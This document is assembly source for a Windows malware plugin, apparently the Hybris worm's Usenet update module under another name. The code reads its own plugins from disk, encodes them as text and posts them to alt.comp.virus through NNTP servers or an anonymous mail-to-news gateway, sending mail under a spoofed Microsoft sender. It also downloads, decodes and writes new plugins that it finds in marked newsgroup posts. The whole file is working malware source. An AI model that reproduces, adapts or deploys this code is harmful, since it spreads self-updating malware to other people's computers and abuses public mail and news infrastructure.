;muazzin reproduction - default muazzin

BITS 32

%include "\muazzin\muazzin.asi"
%include "\muazzin\samples\socket.inc"
%include "\inc\reg.inc"

;%define DEBUG 1

TYPE    EQU "news"
VERSION EQU 0106h

RECV_BUFFER EQU 800h

entry:
       mov esi, [esp+4]
       test dword [esi+m_why], MT_BREED         ;to a lunar event...
       jnz near sendmuazzins                    ;... a lunar event effect
       test dword [esi+m_why], MT_BLOOM
       jnz near getmuazzins
       test dword [esi+m_why], MT_QUERY
       jnz .query
       mov dword [esi+m_result], MR_DONE
       ret 4

  .query:
       mov esi, MT_QUERY+MT_BLOOM+MT_BREED
       mov ebx, TYPE
       mov ecx, VERSION
       mov eax, MR_DONE
       ret 4

delta:
       call .delta
  .delta:
       pop ebp
       sub ebp, .delta
       ret

byebye:
       pop esi
       mov edi, esp
       push byte 6
       push edi
       mov eax, "quit"
       stosd
       mov eax, 0a0d0a0dh
       stosd
       call safesend                    ;disconect
       jmp esi

select_group:
       pop esi
       sub esp, 200h                            ;ebx=socket
       mov edi, esp
       push dword 200h
       push edi
       call saferecv                            ;get info server
       lea eax, [ebp+newsgroup]
       push byte newsgroup_size
       push eax
       call safesend
       push dword 200h
       push edi
       call saferecv
       cmp dword [edi], "211 "                  ;group selected
       jmp esi

dllinit:
       call delta
       pushad
       mov eax, [esi+m_muazzin]
       mov [ebp+mtable], eax
       mov eax, [esi+m_iroutine]
       mov [ebp+mcall], eax
       mov eax, [esi+GPA]
       mov [ebp+getpaddr], eax
       mov eax, [esi+GMH]
       mov [ebp+getmhnd], eax
       lea esi, [ebp+import_table]
  .next_dll:
       lodsd
       test eax, eax
       jz .all_import
       push esi
       stc
       sbb ebx, ebx
       lea esi, [eax+ebp]
       push esi
       call [ebp+getmhnd]
       test eax, eax
       jnz .dll_in_mem
       push esi
       call [ebp+LoadLibraryA]
       mov ebx, eax
  .dll_in_mem:
       xchg ebx, eax                            ;ebx==module handle
       mov ecx, [esp]
       mov [ecx-4], eax                         ;-1==no unload dll
  .skip_dllname:
       lodsb
       test al, al
       jnz .skip_dllname
  .next_import:
       lodsd
       test eax, eax
       jz .dll_done
       add eax, ebp
       push eax
       push ebx
       call [ebp+getpaddr]
       mov [esi-4], eax
       jmp .next_import
  .dll_done:
       pop esi
       jmp .next_dll
  .all_import:
       popad
       ret

dllfree:
       pushad
       lea esi, [ebp+import_table]
  .next_unload:
       lodsd
       test eax, eax
       jz .all_unload
       inc eax
       jz .next_unload
       dec eax
       push eax
       call [ebp+FreeLibrary]
       jmp .next_unload
  .all_unload:
       popad
       ret

safesend:
       pushad
  .again:
       push byte 0
       push dword [esp+(8*4)+8+4]
       push dword [esp+(8*4)+4+8]
       push ebx
       call [ebp+send]
       xchg eax, ecx
       jecxz .set_eax
       inc ecx
       jnz .no_error
       call [ebp+WSAGetLastError]
       sub eax, EWOULDBLOCK
       jz .again
       sub ecx, ecx
  .no_error:
       dec ecx
  .set_eax:
       mov [esp+7*4], ecx
       popad
       ret 8

saferecv:
       pushad
  .again:
       push byte 0
       push dword [esp+(8*4)+8+4]
       push dword [esp+(8*4)+4+8]
       push ebx
       call [ebp+recv]
       xchg eax, ecx
       jecxz .set_eax
       inc ecx
       jnz .no_error
       call [ebp+WSAGetLastError]
       sub eax, EWOULDBLOCK
       jz .again
       sub ecx, ecx
  .no_error:
       dec ecx
  .set_eax:
       mov [esp+7*4], ecx
       popad
       ret 8

;encode seed
;input
;size
;output
muazzin2txt:
       pushad
       mov edi, [esp+(8*4)+4]
       mov ecx, [esp+(8*4)+8]
       mov esi, [esp+(8*4)+12]
       mov ebx, [esp+(8*4)+16]
       sub edx, edx
       mov eax, 0a0dh
       stosw
  .next_char:
       push ecx
       inc edx
       lodsb
       mov ah, al
       and al, 000001111b
       and ah, 011110000b
       shr ah, 4
       add ax, bx
       cmp al, "Z"
       jbe .ok_al
       sub al, "Z"-"A"
  .ok_al:
       cmp ah, "Z"
       jbe .ok_ah
       sub ah, "Z"-"A"
  .ok_ah:
       stosw
       cmp dl, 32
       jbe .no_line
       mov ax, 0a0dh
       stosw
       sub edx, edx
  .no_line:
       pop ecx
       loop .next_char
       mov eax, 0d2e0a0dh
       stosw
       mov dword [edi], "****"
       scasd
       stosd
       mov eax, 000a0d0ah
       stosd
       sub edi, [esp+(8*4)+4]
       mov [esp+7*4], edi
       popad
       ret 16

;key
;in
;out
;size
txt2muazzin:
       pushad
       mov ecx, [esp+(8*4)+4]
       mov edi, [esp+(8*4)+8]
       mov esi, [esp+(8*4)+12]
       mov ebx, [esp+(8*4)+16]
       push edi
       sub edx, edx
  .main_loop:
       cmp dword [esi], "****"
       je .done
       lodsb
       cmp al, "z"
       ja .skip
       cmp al, "a"
       jb .skip2
       or al, 20h
  .skip2:
       cmp al, "A"
       jb .skip
       cmp al, "Z"
       ja .skip
       cmp dl, 0
       jne .decrypt
       mov dl, al
       jmp .skip
  .decrypt:
       mov dh, al
       sub dl, bl
       jnc .nofix1
       add dl, "Z"-"A"
  .nofix1:
       sub dh, bh
       jnc .nofix2
       add dh, "Z"-"A"
  .nofix2:
       shl dh, 4
       or dl, dh
       sub eax, eax
       xchg eax, edx
       stosb
  .skip:
       loop .main_loop
  .done:
       pop eax
       sub edi, eax
       mov [esp+7*4], edi
       popad
       ret 16

retrieve_server:
       sub edx, edx
       pushad
       sub esi, esi
       lea edx, [ebp+reg]
       push esi
       push esp
       push dword KEY_ALL_ACCESS
       push esi
       push edx
       push dword HKEY_CURRENT_USER
       call [ebp+RegOpenKeyExA]
       pop ebx
       test eax, eax
       jnz .done
       push ebx
       push esi
       mov edx, esp
       push byte 4
       push esp
       push edx
       push esi
       push esi
       push dword [esp+(8*4)+(8*4)]
       push ebx
       call [ebp+RegQueryValueExA]
       pop ebx
       pop eax
       mov [esp+(4*6)], eax             ;exit EDX
       call [ebp+RegCloseKey]
  .done:
       popad
       ret 4

rnd:
       pushad
       mov eax, 12345678h
  seed equ $-4
       mov ecx, 41c64e6dh
       mul ecx
       add eax, 3039h
       and eax, 7ffffffh
       call delta
       mov [ebp+seed], eax
       mov ecx, [esp+(8*4)+4]
       jecxz .nolimit
       cdq
       div ecx
       xchg eax, edx
  .nolimit:
       mov [esp+(7*4)], eax
       popad
       bt eax, 1
       ret 4

validate_string:
       push esi
       push ebx
       sub ebx, ebx
       mov eax, ebx
  .loop:
       lodsb
       test al, al
       jz .end
       cmp al, "A"                      ;below A isnt for sure
       jb .loop
       cmp al, "z"                      ;above z isnt for sure
       ja .loop
       cmp al, "a"
       jae .lowcase
       cmp al, "Z"
       ja .loop
  .lowcase:
       and al, 0dfh
       add al, -"A"
       add ebx, eax
       jmp .loop
  .end:
       cmp ebx, "Z"-"A"
       jbe .done
       add ebx, -("Z"-"A")
       jmp .end
  .done:
       lea eax, [ebx+"A"]
       pop ebx
       pop esi
       ret

sendmuazzins:
       call dllinit
       pushad
       push byte -1
       call rnd
       and eax, 01111b                  ;1/16 chances of run
       or eax, eax
       jnz .giveup1
  .noinet:
       call CheckInet
       jnc .inet
       push dword 15*60*1000
       call [ebp+Sleep]
       jmp .noinet
  .inet:
       push byte 32
       sub ebx, ebx
       mov esi, 12345678h
  mtable equ $-4
       pop ecx
  .try_next:
       mov eax, [esi+menum_kind]
       test eax, eax
       je .empty_slot
       test eax, MS_SENT                        ;already sent?
       jne .empty_slot
       mov eax, [esi+menum_version]
       cmp ah, 0                                ;version >1.00
       jne .share
  .empty_slot:
       add esi, menum_sizeof
       loop .try_next
  .giveup1:
       jmp .giveup
  .share:
       or dword [esi+menum_kind], MS_SENT
       mov [ebp+entry_muazzin], esi             ;need to form subject
       sub cl, 32
       neg cl
       sub esp, 100h
       push esp
       call [ebp+mcall]
       mov edx, esp
       push ebx
       push dword 80h
       push byte 3                   ;open existing
       push ebx
       push ebx
       push dword 80000000h             ;GENERIC_READ
       push edx
       call [ebp+CreateFileA]
       add esp, 100h
       mov ebx, eax
       inc eax
       jz near .noinet
       push ebx
       push dword 64*1024
       push byte 40h
       call [ebp+GlobalAlloc]
       mov [ebp+buffer_muazzin], eax
       mov edi, eax
       test eax, eax
       jz .mem_error
       sub eax, eax
       push eax
       push esp
       xchg eax, [esp]
       push eax
       push dword 64*1024
       push edi
       push ebx
       call [ebp+ReadFile]
       pop eax
       mov [ebp+size_muazzin], eax
  .mem_error:
       call [ebp+CloseHandle]
       test edi, edi
       jz near .noinet
       push eax
       push eax
       push eax
       push eax
       push esp
       call [ebp+GetSystemTime]
       pop edi                  ;year/month
       pop eax                  ;day
       pop ecx          ;trash
       mov [ebp+seed], ecx
       pop ecx          ;trash
       xor [ebp+seed], ecx
       push byte 10
       pop ecx
       shr eax, 16
       div cl           ;ax/cl
       add ax, "00"
       mov [ebp+dia], ax
       mov eax, edi
       shr eax, 16
       div cl
       add ax, "00"
       mov [ebp+mes], ax
       movzx eax, di
       cdq
       div ecx
       mov bh, dl
       cdq
       div ecx
       mov bl, dl
       add bx, "00"
       mov [ebp+ano+2], bx
       cdq
       div ecx
       mov bh, dl
       cdq
       div ecx
       mov bl, dl
       add bx, "00"
       mov [ebp+ano], bx
       sub esp, WSAdata_size
       push esp
       push dword 0101h
       call [ebp+WSAStartup]
       sub esp, -WSAdata_size
       push byte IPPROTO_IP
       push byte SOCK_STREAM
       push byte AF_INET
       call [ebp+socket]
       mov ebx, eax
       inc eax
       jz near .endinet
       push ebx

       lea eax, [ebp+reg.key2]
       push eax
       call retrieve_server             ;get nntp server in EDX
       test edx, edx
       jz near .mail2news

       sub eax, eax
       push eax
       push eax
       push edx
       push dword 77000002h
       mov eax, esp
       push byte sockaddr_in_size
       push eax
       push ebx
       call [ebp+connect]
       sub esp, -(sockaddr_in_size)
       test eax, eax
       jnz .mail2news

       call select_group
       jne .m2n
       mov edi, esp
       push byte 6
       push edi
       mov eax, "post"
       stosd
       mov eax, 0a0d0a0dh
       stosd
       call safesend
       push dword 200h
       push edi
       call saferecv
       cmp dword [edi], "340 "
       jne .m2n
       mov edi, esp
       lea esi, [ebp+newsgroup]
       mov eax, "News"
       stosd
       movsd
       movsb
       mov al, ":"
       stosb
       mov ecx, newsgroup_size2
       rep movsb
       sub edi, esp
       push esp
       xchg edi, [esp]
       push edi
       call safesend
       jmp .header_done

  .m2n:
       call byebye
       sub esp, -200h

  .mail2news:
       lea eax, [ebp+reg.key]
       push eax
       call retrieve_server             ;get smtp server in EDX
       test edx, edx
       jnz .was_saved
       db 0b8h+2
       db 18,26,0,36                    ;mail.lcs.mit.edu
  .was_saved:
       sub eax, eax
       push eax
       push eax
       push edx                         ;smtp server
       push dword 19000002h             ;port 25 AF_INET
       mov eax, esp
       push byte sockaddr_in_size
       push eax
       push ebx
       call [ebp+connect]
       sub esp, -(sockaddr_in_size)
       test eax, eax
       jnz near .cantconnect
       sub esp, 200h                            ;ebx=socket
       mov edi, esp                             ;edi=buffer
       push dword 200h
       push edi
       call saferecv                            ;get info server
       push byte mail4_size
       lea eax, [ebp+mail4]
       push eax
       push byte mail3_size
       add eax, mail3-mail4
       push eax
       push byte mail2_size
       add eax, mail2-mail3
       push eax
       push byte mail1_size
       lea eax, [ebp+mail1]
       push eax
       push byte mail0_size
       lea eax, [ebp+mail0]
       push eax
  .next_header:
       call safesend
       push dword 200h
       push edi
       call saferecv
       xchg ecx, eax
       jecxz .error
       inc ecx
       jecxz .error
       cmp edi, esp
       je .header_done
       cmp dword [edi], "250 "
       je .next_header
  .error:
       mov esp, edi
       jmp .email_error
 .header_done:
       mov edi, esp
       mov eax, "Subj"
       stosd
       sub eax, "Subj"-"ect:"
       stosd
       sub al, "e"-" "
       stosb
       mov dl, al
       mov esi, edi
       mov ecx, 12345678h
  entry_muazzin equ $-4
       mov eax, [ecx+menum_type]
       stosd
       mov al, dl
       stosb
       mov eax, [ecx+menum_version]
       stosd
       mov al, dl
       stosb
       push byte 40
       call rnd
       lea ecx, [eax+8]                         ;8..47
       mov edx, edi
  .subject_loop:
       push byte 26
       call rnd
       lea eax, [eax+"A"]
       jc .up
       or al, 20h
  .up:
       stosb                                    ;build subject
       loop .subject_loop
       movzx eax, word [edx]                ;the key are the 2 first letters
       and ax, 0dfdfh                       ;of garbage in Subject (upcase)
       add word [edx-5], ax
       mov [ebp+key_muazzin], eax
       add word [edx-3], ax             ;encode version
       sub eax, eax
       stosb
       call validate_string
       inc edi
       or eax, 000a0d00h
       mov [edi-2], eax
       mov eax, esp
       xchg eax, edi                            ;edi=start of buffer
       inc eax
       sub eax, esp                             ;eax=size
       push eax
       push edi
       call safesend
       push dword "AA"
  key_muazzin equ $-4
       push dword 12345678h
  buffer_muazzin equ $-4
       push dword 12345678h
  size_muazzin equ $-4
       mov esi, [esp+4]
       mov edi, [esp]
       add edi, esi
       push edi
       call muazzin2txt
       push eax
       push edi
       call safesend                    ;send muazzin and .
       call byebye
       mov dword [ebp+sendmuazzins.patch+1], 090909090h
       mov byte [ebp+sendmuazzins.patch], 090h
  .email_error:
       sub esp, -200h
  .cantconnect:
       call [ebp+closesocket]
  .endinet:
       call [ebp+WSACleanup]
  .patch:
       jmp .noinet
       push dword [ebp+buffer_muazzin]
       call [ebp+GlobalFree]
  .giveup:
       call dllfree
       popad
       mov dword [esi+m_result], MR_OK
       ret 4

getmuazzins:
       call dllinit
       pushad
       call [ebp+GetTickCount]
       mov [ebp+seed], eax
  .noinet:
       call CheckInet
       jnc .inet
  .noinet2:
       push dword 5*60*1000
       call [ebp+Sleep]
       jmp .noinet
  .inet:
       sub esp, WSAdata_size
       push esp
       push dword 0101h
       call [ebp+WSAStartup]
       sub esp, -WSAdata_size
       push byte IPPROTO_IP
       push byte SOCK_STREAM
       push byte AF_INET
       call [ebp+socket]
       mov ebx, eax
       inc eax
       jz near .endinet
       push ebx
       lea eax, [ebp+reg.key2]
       push eax
       call retrieve_server             ;get smtp server in EDX
       test edx, edx
       jnz .was_saved
       push byte nntp_server_size / 4
       call rnd
       mov edx, [ebp+nntp_server+(eax*4)]
  .was_saved:
       sub eax, eax
       push eax
       push eax
       push edx
       push dword 77000002h
       mov eax, esp
       push byte sockaddr_in_size
       push eax
       push ebx
       call [ebp+connect]
       sub esp, -(sockaddr_in_size)
       test eax, eax
       jnz near .cantconnect
%ifdef DEBUG
       inc byte [ebp+.8348324-2]
%endif
       call select_group
       jne near .out

       push dword 64*1024
       push byte 40h
       call [ebp+GlobalAlloc]
       mov [ebp+.mem_handle], eax
       test eax, eax
       jz near .out


  .next_post:
       mov edi, esp
       push byte 6
       push edi
       mov eax, "next"
       stosd
       mov eax, 0a0d0a0dh
       stosd
       call safesend
       push dword 200h
       push edi
       call saferecv
       cmp dword [edi], "223 "
       jne near .error                                 ;no more articles?

       push byte 6
       push edi
       mov eax, "head"
       stosd
       mov eax, 0a0d0a0dh
       stosd
       call safesend
       push dword 200h
       push edi
       call saferecv
       cmp dword [edi], "221 "
       jne near .error                                 ;no more articles?

       mov edi, dword [ebp+.mem_handle]
       push edi
       call recvdata                    ;receive full header
       test eax, eax
       jz .next_post

       mov ecx, "Subj"
       mov edx, "ect:"
       xchg eax, ecx
  .keep_searching:
       repne scasb
       cmp ecx, 8                              ;edi=subject
       jbe near .next_post
       cmp dword [edi-1], eax
       jne .keep_searching
       cmp dword [edi+3], edx
       jne .keep_searching
       scasd
       scasd

       lea esi, [ebp+subject_buffer]
       xchg esi, edi
  .search_subject_end:
       lodsb
       cmp al, 0dh
       je ._here
       stosb
       loop .search_subject_end
       jmp .next_post
  ._here:
       sub edx, edx
       mov al, dl
       stosb
       lea esi, [ebp+subject_buffer]
       sub edi, esi
       mov ecx, edi                             ;esi,ecx

%ifdef DEBUG
  .log_subject:
       pushad
       sub esp, 100h
       sub ebx, ebx
       push ebx
       push dword 80h
       push byte 4                   ;open always
       push ebx
       push ebx
       push dword 0c0000000h
       call .8348324
       db "d:\lista.000",0
  .8348324:
       call [ebp+CreateFileA]
       mov ebx, eax
       inc eax
       jz .error1121221
       push byte 2
       push byte 0
       push byte 0
       push ebx
       call [ebp+SetFilePointer]
       mov edi, esp
  .do1234324:
       lodsb
       stosb
       test al, al
       jnz .do1234324
       dec edi
       mov ax, 0a0dh
       stosw
       mov esi, esp
       sub edi, esi
       mov ecx, edi
       push byte 0
       mov eax, esp
       push byte 0
       push eax
       push ecx
       push esi
       push ebx
       call [ebp+WriteFile]
       mov [esp], ebx
       call [ebp+CloseHandle]
  .error1121221:
       sub esp, -100h
       popad
%endif

       xchg byte [esi+ecx-2], dl
       call validate_string             ;is one of our posts?
       cmp al, dl
       jnz near .next_post

       movzx eax, word [esi+10]
       and ax, 0dfdfh
       mov dword [ebp+.m_key], eax
       sub word [esi+5], ax             ;retrieve info from subject
       sub word [esi+7], ax
       mov edx, dword [esi+5]
       mov eax, dword [esi]

       sub edi, edi             ;eax=type
       mov esi, [ebp+mtable]    ;edx=version
       push byte 32
       pop ecx
  .vrf_muazzin:
       push ecx

       test edi, edi
       jnz .no_empty
       cmp [esi+menum_type], edi
       jne .no_empty

  .muazzin_update:
       test edi, edi
       jz .e44234
       mov dword [edi+menum_type], 0          ;free tmp-alloc slot
  .e44234:
       sub cl, 32
       neg cl
       mov [esi+menum_type], ecx
       mov edi, esi                             ;edi=empty muazzin slot
       jmp .vrf_next_muazzin

  .no_empty:
       cmp [esi+menum_type], eax
       jne .vrf_next_muazzin
       cmp [esi+menum_version], edx
       jb .muazzin_update

       test edi, edi            ;usenet muazzin is older than installed
       jz .zkipzz
       mov dword [edi+menum_type], 0          ;free tmp-alloc slot
  .zkipzz:
       jmp near .next_post

  .vrf_next_muazzin:
       add esi, menum_sizeof
       pop ecx
       dec ecx
       jnz .vrf_muazzin

  .get_muazzin:
       test edi, edi
       jz near .next_post

       mov [edi+menum_version], edx
       xchg [edi+menum_type], eax
       mov dword [edi+menum_kind], MS_SENT
       mov [ebp+.name_index], eax

       mov edi, esp                          ;get da muazzin
       push byte 6
       push edi
       mov eax, "body"
       stosd
       mov eax, 0a0d0a0dh
       stosd
       call safesend
       push dword 200h
       push edi
       call saferecv
       cmp dword [edi], "222 "
       jne near .next_post

       mov edx, [ebp+.mem_handle]
       mov esi, edx

  .recv_loop:
       push edx
       call recvdata
       test eax, eax
       jne .error

  .unscramble:
       mov edi, edx
       push dword 12345678h             ;key
 .m_key equ $-4
       push esi                         ;inbuffer
       push edx                         ;outbuffer
       sub edx, esi
       push edx                         ;size
       call txt2muazzin

       sub esi, esi
       xchg esi, eax
       mov ecx, dword 12345678h
  .name_index equ $-4
       push esp
       call [ebp+mcall]                 ;get name to use
       mov edx, esp
       push eax
       push dword 80h
       push byte 2                   ;create always
       push eax
       push eax
       push dword 40000000h             ;GENERIC_WRITE
       push edx
       call [ebp+CreateFileA]
       push ebx
       mov ebx, eax
       inc eax
       jz near .next_post
       push byte 0
       mov eax, esp
       push byte 0
       push eax
       push esi
       push edi
       push ebx
       call [ebp+WriteFile]
       mov [esp], ebx
       call [ebp+CloseHandle]
       jmp .next_post

  .error:
       push dword 12345678h
  .mem_handle equ $-4
       call [ebp+GlobalFree]
  .out:
       mov edi, esp
       push byte 6
       push edi
       mov eax, "quit"
       stosd
       mov eax, 0a0d0a0dh
       stosd
       call safesend                    ;disconect
       sub esp, -200h
  .cantconnect:
       call [ebp+closesocket]
  .endinet:
       call [ebp+WSACleanup]
       jmp .noinet2
  .giveup:
       call dllfree
       popad
       mov dword [esi+m_result], MR_OK
       ret 4

recvdata:
       pushad
       mov esi, [esp+8*4+4]
       mov edx, esi
       sub edi, edi
  .cont:
       push dword 200h
       push edx
       call saferecv
       add edi, eax
       lea edx, [edi+esi]
       call .searchdot
       jnc .return
       test eax, eax
       jz ._end
       inc eax
       jnz .cont
  ._end:
       sub edi, edi
  .return:
       mov dword [edi+esi], 0
       mov [esp+7*4], edi
       popad
       ret 4

  .searchdot:
       pushad
       mov ecx, edi
       mov edi, esi
       mov eax, 0d2e0a0dh
  .retry:
       repne scasb
       jecxz .error
       cmp dword [edi-1], eax
       jne .retry
       db 0b0h
  .error:
       stc
       popad
       ret

%ifdef DEBUG
msgbox:
       pushad
       push byte 0
       call .zkip
       db "DEBUG", 0
  .zkip
       push dword [esp+8*4+3*4]
       push byte 0
       call delta
       call [ebp+MessageBoxA]
       popad
       ret 4
%endif

%include "\muazzin\samples\inet.asi"

reg    db "Software\Microsoft\Windows\CurrentVersion\Controls Folder\Hybris",0
.key   db "SMTP Server",0
.key2  db "NNTP Server",0

newsgroup  db "group"
newsgroup2 db " alt.comp.virus",13,10
newsgroup_size  equ $-newsgroup
newsgroup_size2 equ $-newsgroup2

mail0  db "helo localhost",13,10
mail0_size equ $-mail0

mail1  db "rset",13,10
mail1_size equ $-mail1

mail2  db "mail from: <root@microsoft.com>",13,10
mail2_size equ $-mail2

mail3  db "rcpt to: <mail2news_nospam-"
ano    db "YYYY"
mes    db "MM"
dia    db "DD"
       db "-alt.comp.virus@anon.lcs.mit.edu>",13,10
mail3_size equ $-mail3
       db 0

mail4  db "data",13,10
mail4_size equ $-mail4

nntp_server:
%include "nntp.inc"
nntp_server_size equ $-nntp_server

import_table dd kernel32
             dd advapi32
             dd wsock32
%ifdef DEBUG
             dd user32
%endif
             dd 0

kernel32    db "KERNEL32.DLL", 0
.api001     dd .apiname001
.api002     dd .apiname002
.api003     dd .apiname003
.api004     dd .apiname004
.api005     dd .apiname005
.api006     dd .apiname006
.api007     dd .apiname007
.api008     dd .apiname008
.api009     dd .apiname009
.api010     dd .apiname010
.api011     dd .apiname011
%ifdef DEBUG
.api012     dd .apiname012
%endif
            dd 0
.apiname001 db "LoadLibraryA", 0
.apiname002 db "FreeLibrary", 0
.apiname003 db "CreateFileA", 0
.apiname004 db "CloseHandle", 0
.apiname005 db "ReadFile", 0
.apiname006 db "GlobalAlloc", 0
.apiname007 db "GlobalFree", 0
.apiname008 db "Sleep",0
.apiname009 db "GetSystemTime",0
.apiname010 db "GetTickCount",0
.apiname011 db "WriteFile",0
%ifdef DEBUG
.apiname012 db "SetFilePointer",0
%endif

advapi32    db "ADVAPI32.DLL", 0
.api001     dd .apiname001
.api002     dd .apiname002
.api003     dd .apiname003
            dd 0
.apiname001 db "RegOpenKeyExA", 0
.apiname002 db "RegCloseKey", 0
.apiname003 db "RegQueryValueExA", 0

wsock32     db "WS2_32.DLL",0
.api001     dd .apiname001
.api002     dd .apiname002
.api003     dd .apiname003
.api004     dd .apiname004
.api005     dd .apiname005
.api006     dd .apiname006
.api007     dd .apiname007
.api008     dd .apiname008
            dd 0
.apiname001 db "connect", 0
.apiname002 db "closesocket", 0
.apiname003 db "recv", 0
.apiname004 db "send", 0
.apiname005 db "WSAGetLastError", 0
.apiname006 db "WSAStartup", 0
.apiname007 db "WSACleanup", 0
.apiname008 db "socket", 0

%ifdef DEBUG
user32      db "USER32.DLL",0
.api001     dd .apiname001
            dd 0
.apiname001 db "MessageBoxA", 0

MessageBoxA equ user32.api001
SetFilePointer equ kernel32.api012
%endif

LoadLibraryA     equ kernel32.api001
FreeLibrary      equ kernel32.api002
CreateFileA      equ kernel32.api003
CloseHandle      equ kernel32.api004
ReadFile         equ kernel32.api005
GlobalAlloc      equ kernel32.api006
GlobalFree       equ kernel32.api007
Sleep            equ kernel32.api008
GetSystemTime    equ kernel32.api009
GetTickCount     equ kernel32.api010
WriteFile        equ kernel32.api011

RegOpenKeyExA    equ advapi32.api001
RegCloseKey      equ advapi32.api002
RegQueryValueExA equ advapi32.api003

connect          equ wsock32.api001
closesocket      equ wsock32.api002
recv             equ wsock32.api003
send             equ wsock32.api004
WSAGetLastError  equ wsock32.api005
WSAStartup       equ wsock32.api006
WSACleanup       equ wsock32.api007
socket           equ wsock32.api008

LOADLIB equ LoadLibraryA
FREELIB equ FreeLibrary

mcall  dd 0
getpaddr dd 0
getmhnd  dd 0

subject_buffer:
